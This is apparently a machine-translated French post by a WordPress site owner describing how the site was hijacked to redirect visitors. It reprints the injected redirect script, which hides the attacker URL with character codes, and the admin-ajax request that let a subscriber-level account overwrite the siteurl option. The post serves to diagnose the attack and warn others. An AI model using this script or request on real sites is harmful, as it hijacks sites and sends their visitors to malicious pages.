La semaine dernière, je suis tombé sur un fait extrêmement désagréable. Après avoir visité mon site, j'ai constaté qu'il me redirige vers une ressource inconnue de moi, que le Dr antivirus jure extrêmement Web
Fièrement propulsé par WordPress version 5.1
Toutes les mises à jour sortantes pour le moteur, le plugin et le thème sont installées à temps. Plugins uniquement depuis le dépôt officiel, thème aussi.
La sauvegarde du site a été immédiatement téléchargée, analysée par un logiciel antivirus (Dr. Web, Kaspersky, AI-BOLIT) - mais il n'y a eu aucun résultat, tout est propre.
Fichiers de thèmes et plugins vérifiés manuellement, mais là encore, aucun résultat n'a été obtenu.
Lors de la vérification du vidage de la base de données dans la table wp_options du paramètre siteurl, l'URL de quelqu'un d'autre était masquée. En fait, il y avait une redirection vers lui.
Cela s'est passé selon le principe: lors du chargement de la page, le paramètre «siteurl» a été remplacé dans tous les
<script type='text/javascript' src=' URL '></script>
Dans ce cas, le script suivant a été chargé:
var x = getCookie('pp000001'); if (x) { var x2 = getCookie('pp000002'); if (x2) { var sdfgdfg = "URL";document.location.replace(sdfgdfg);window.location.href = sdfgdfg;document.location.href = sdfgdfg; } else { setCookie('pp000002','1',1); var sdfgdfg = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 108, 105, 99, 107, 46, 110, 101, 119, 112, 117, 115, 104, 46, 115, 117, 112, 112, 111, 114, 116, 47, 101, 115, 117, 122, 110, 120, 105, 102, 113, 107);document.location.replace(sdfgdfg);window.location.href = sdfgdfg;document.location.href = sdfgdfg; } } else { setCookie('pp000001','1',1); var sdfgdfg = "URL";document.location.replace(sdfgdfg);window.location.href = sdfgdfg;document.location.href = sdfgdfg; } function setCookie(name,value,days) { var expires = ""; if (days) { var date = new Date(); date.setTime(date.getTime() + (days*8*60*60*1000)); expires = "; expires=" + date.toUTCString(); } document.cookie = name + "=" + (value || "") + expires + "; path=/"; } function getCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for(var i=0;i < ca.length;i++) { var c = ca[i]; while (c.charAt(0)==' ') c = c.substring(1,c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length); } return null; } function eraseCookie(name) { document.cookie = name+'=; Max-Age=-99999999;'; }
La façon dont l'URL de quelqu'un d'autre a pénétré dans la base de données reste un mystère. Changer l'URL à droite, tout a fonctionné à nouveau, mais le lendemain, lors de la vérification, j'ai de nouveau vu le Dr Le Web jure sur la page redirigée. Ce paramètre a de nouveau été modifié dans la base de données.
Après cela, de nouveaux journaux d'accès au site et des journaux d'erreurs ont été téléchargés. Il n'y a pas eu d'erreurs, mais une demande extrêmement intéressante a été trouvée sur le site dans les journaux d'accès:
/wp-admin/admin-ajax.php?action=fs_set_db_option&option_name=siteurl&option_value= URL
Après avoir à nouveau corrigé les paramètres et vérifié que tout fonctionne, j'ai essayé de répéter cette demande sur le site, mais rien n'a fonctionné. Le paramètre dans la base de données n'a pas changé.
Il est à noter que le site est ouvert à l'inscription et que les utilisateurs obtiennent le rôle d '"Abonné", l'accès à la partie administrative est complètement fermé.
Une tentative a été faite pour enregistrer un nouvel utilisateur, se connecter et après que cette demande au site a fonctionné, le paramètre dans la base de données a changé.
En conséquence, il s'avère que si l'inscription des utilisateurs est ouverte sur le site, même avec le rôle Abonné et que l'accès au panneau d'administration est fermé, cette demande fonctionne toujours.
Il a été vérifié sur un autre site, après avoir désactivé tous les plugins et défini le thème par défaut - le résultat est le même.
Comment se battre, sauf comment désactiver l'enregistrement et supprimer les utilisateurs suspects - Je n'ai pas encore trouvé de solution.
PS: google la demande, des sites infectés ont été trouvés, soyez prudent.